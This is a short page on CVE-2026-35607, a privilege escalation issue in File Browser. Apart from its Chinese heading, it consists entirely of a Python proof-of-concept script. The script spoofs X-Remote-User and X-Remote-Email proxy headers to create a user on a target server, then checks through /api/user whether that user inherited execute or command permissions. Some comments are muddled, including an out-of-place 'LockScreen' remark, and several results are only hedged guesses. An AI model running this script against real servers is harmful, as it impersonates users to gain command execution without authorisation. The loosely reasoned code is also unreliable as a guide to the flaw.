CVE-2026-35607 File Browser 权限提升漏洞

# PoC Concept for CVE-2026-35607: Proxy Auth Permission Inheritance import requests target_url = "http://target-filebrowser.com" # Step 1: Simulate Proxy Authentication to create user # Assuming the reverse proxy sets the X-Remote-User header headers = { "X-Remote-User": "attacker", "X-Remote-Email": "[email protected]" } # Trigger login/creation via proxy session = requests.Session() login_resp = session.get(f"{target_url}/api/public/settings", headers=headers) if login_resp.status_code == 200: print("[+] User potentially created via Proxy Auth.") # Step 2: Attempt to verify execution permissions # In vulnerable versions, this user might inherit 'execute' perms from global defaults # Checking API settings or attempting a command execution endpoint api_resp = session.get(f"{target_url}/api/user") if api_resp.status_code == 200: user_data = api_resp.json() # Check if 'commands' or 'execute' permissions are enabled (LockScreen usually prevents this in fixed versions) perm = user_data.get('perm', {}) if perm.get('execute') or perm.get('commands'): print(f"[!] VULNERABILITY CONFIRMED: User has execution permissions: {perm}") else: print("[-] User does not have execution permissions. Patched or restricted defaults.") else: print("[-] Connection failed.")